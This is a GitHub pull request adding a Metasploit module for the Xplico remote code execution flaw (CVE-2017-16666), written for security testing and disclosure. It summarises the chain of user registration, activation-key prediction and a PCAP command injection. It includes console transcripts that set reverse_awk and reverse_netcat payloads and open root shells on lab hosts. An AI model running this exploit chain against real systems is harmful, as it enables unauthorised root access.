Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Add Xplico Remote Code Execution Module #9206

Merged
merged 2 commits into from Jan 3, 2018

Conversation

@mmetince
Copy link
Contributor

commented Nov 14, 2017

This module exploits command injection vulnerability. Unauthenticated users can register a new account and then execute a terminal command under the context of the root user.

Vulnerable Application Installation Steps

Follow instruction from "from sourceforge" section at following URL. Don't forget install version 1.2.0 instead of 1.0.0. At the time of this writing, installation commands contains command for version 1.0.0

http://wiki.xplico.org/doku.php?id=ubuntu

You may also give a try to virtualbox image provided by maintainer of Xplico.
https://sourceforge.net/projects/xplico/files/VirtualBox%20images/

Verification Steps

A successful check of the exploit will look like this:

  • Start msfconsole
  • use exploit/linux/http/securityonion_xplico_exec
  • Set RHOST
  • Set PAYLOAD cmd/unix/reverse_awk
  • Set LHOST
  • Run exploit
  • Verify that you are seeing New user successfully registered in console.
  • Verify that you are seeing User successfully activated in console.
  • Verify that you are seeing Successfully authenticated in console.
  • Verify that you are seeing New Case successfully creted in console.
  • Verify that you are seeing New Sols successfully creted in console.
  • Verify that you are seeing PCAP successfully uploaded. Pcap parser is going to start on server side in console.
  • Verify that you are getting We are at PCAP decoding phase. Little bit more patience... in console.
  • Verify that you have your root shell.

Scenarios

msf > use exploit/linux/http/securityonion_xplico_exec
msf exploit(securityonion_xplico_exec) > set RHOST 12.0.0.30
RHOST => 12.0.0.30
msf exploit(securityonion_xplico_exec) > 
msf exploit(securityonion_xplico_exec) > exploit 

[-] Exploit failed: A payload has not been selected.
[*] Exploit completed, but no session was created.
msf exploit(securityonion_xplico_exec) > set payload cmd/unix/
set payload cmd/unix/generic         set payload cmd/unix/reverse_netcat
set payload cmd/unix/reverse_awk     
msf exploit(securityonion_xplico_exec) > set payload cmd/unix/reverse_awk 
payload => cmd/unix/reverse_awk
msf exploit(securityonion_xplico_exec) > set LHOST 12.0.0.1 
LHOST => 12.0.0.1
msf exploit(securityonion_xplico_exec) > exploit 

[*] Started reverse TCP handler on 12.0.0.1:4444 
[*] Initiating new session on server side
[*] Registering a new user
[+] New user successfully registered
[*] Username: mwbvnyowr
[*] Password: gHPkAvCTXFDVcfTwaAmfoJUoMNHNDIDT
[*] Calculating em_key code of the user
[*] Activating user with em_key = 159d4af63472e2a47e3f3c5c11205a5e
[+] User successfully activated
[*] Authenticating with our activated new user
[+] Successfully authenticated
[*] Creating new case
[+] New Case successfully creted. Our pol_id = 36
[*] Creating new xplico session for pcap
[+] New Sols successfully creted. Our sol_id = 54
[*] Uploading malformed PCAP file
[+] PCAP successfully uploaded. Pcap parser is going to start on server side.
[*] Parsing has started. Wait for parser to get the job done...
[+] We are at PCAP decoding phase. Little bit more patience...
[+] We are at PCAP decoding phase. Little bit more patience...
[+] We are at PCAP decoding phase. Little bit more patience...
[*] Command shell session 1 opened (12.0.0.1:4444 -> 12.0.0.30:39782) at 2017-11-08 14:44:52 +0300

id
uid=0(root) gid=0(root) groups=0(root)

Technical Details and Demo
https://pentest.blog/advisory-xplico-unauthenticated-remote-code-execution-cve-2017-16666/

@wvu-r7

This comment has been minimized.

Copy link
Contributor

commented Nov 14, 2017

Xplico? Wow. I used to use that (locally). :D

@wvu-r7 wvu-r7 self-assigned this Nov 14, 2017

@acammack-r7 acammack-r7 assigned dmohanty-r7 and unassigned wvu-r7 Jan 3, 2018

@wvu-r7

This comment has been minimized.

Copy link
Contributor

commented Jan 3, 2018

All yours, @dmohanty-r7.

@dmohanty-r7 dmohanty-r7 merged commit 54936b6 into rapid7:master Jan 3, 2018

2 checks passed

Metasploit Automation - Test Execution Successfully ran `autoPayloadTest.py`.
Details
continuous-integration/travis-ci/pr The Travis CI build passed
Details
dmohanty-r7 added a commit that referenced this pull request Jan 3, 2018
@dmohanty-r7

This comment has been minimized.

Copy link
Contributor

commented Jan 3, 2018

Release Notes

This PR adds an exploit module for Xplio (CVE-2017-16666). It leverages three vulnerabilities to get unauthenticated remote code execution: An exposed user registration page, a weak randomization algorithm to generate the activation code, and a command injection in parsing an uploaded pcap. @mmetince covers the vulnerability via blog post: https://pentest.blog/advisory-xplico-unauthenticated-remote-code-execution-cve-2017-16666

@dmohanty-r7

This comment has been minimized.

Copy link
Contributor

commented Jan 3, 2018

Tested with reverse_awk and reverse_netcat:

msf > use exploit/linux/http/xplico_exec
msf exploit(linux/http/xplico_exec) > set RHOST 1.0.0.2
RHOST => 1.0.0.2
msf exploit(linux/http/xplico_exec) > set payload cmd/unix/reverse_awk
payload => cmd/unix/reverse_awk
msf exploit(linux/http/xplico_exec) > set LHOST 1.0.0.1
LHOST => 1.0.0.1
msf exploit(linux/http/xplico_exec) > run

[*] Started reverse TCP handler on 1.0.0.1:4444
[*] Initiating new session on server side
[*] Registering a new user
[+] New user successfully registered
[*] Username: bmgitoijsmvj
[*] Password: XCNbNNDkWOaRqpTDrYUtsdtOYcpHAIeJ
[*] Calculating em_key code of the user
[*] Activating user with em_key = c78a5439fbbad236bf8006bc4e169723
[+] User successfully activated
[*] Authenticating with our activated new user
[+] Successfully authenticated
[*] Creating new case
[+] New Case successfully creted. Our pol_id = 15
[*] Creating new xplico session for pcap
[+] New Sols successfully creted. Our sol_id = 15
[*] Uploading malformed PCAP file
[+] PCAP successfully uploaded. Pcap parser is going to start on server side.
[*] Parsing has started. Wait for parser to get the job done...
[*] Command shell session 1 opened (1.0.0.1:4444 -> 1.0.0.2:42656) at 2018-01-03 16:47:55 -0600

id
uid=0(root) gid=0(root) groups=0(root)
whoami
root
msf > use exploit/linux/http/xplico_exec
msf exploit(linux/http/xplico_exec) > set RHOST 1.0.0.2
RHOST => 1.0.0.2
msf exploit(linux/http/xplico_exec) > set payload cmd/unix/reverse_netcat
payload => cmd/unix/reverse_netcat
msf exploit(linux/http/xplico_exec) > set LHOST 1.0.0.1
LHOST => 1.0.0.2
msf exploit(linux/http/xplico_exec) > run

[*] Started reverse TCP handler on 1.0.0.1:4444
[*] Initiating new session on server side
[*] Registering a new user
[+] New user successfully registered
[*] Username: ejsollnxeovqab
[*] Password: XmiIQVvrCBCjOaUxUkDPwhZycFXHGVKj
[*] Calculating em_key code of the user
[*] Activating user with em_key = 7f4f096b71a7d3fcf0c010b33566c18f
[+] User successfully activated
[*] Authenticating with our activated new user
[+] Successfully authenticated
[*] Creating new case
[+] New Case successfully creted. Our pol_id = 18
[*] Creating new xplico session for pcap
[+] New Sols successfully creted. Our sol_id = 18
[*] Uploading malformed PCAP file
[+] PCAP successfully uploaded. Pcap parser is going to start on server side.
[*] Parsing has started. Wait for parser to get the job done...
[*] Command shell session 1 opened (1.0.0.1:4444 -> 1.0.0.2:39457) at 2018-01-03 16:57:29 -0600

id
uid=0(root) gid=0(root) groups=0(root)
whoami
root
pwd
/opt/xplico/bin

@tdoan-r7 tdoan-r7 added the rn-exploit label Jan 10, 2018

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
None yet
4 participants
You can’t perform that action at this time.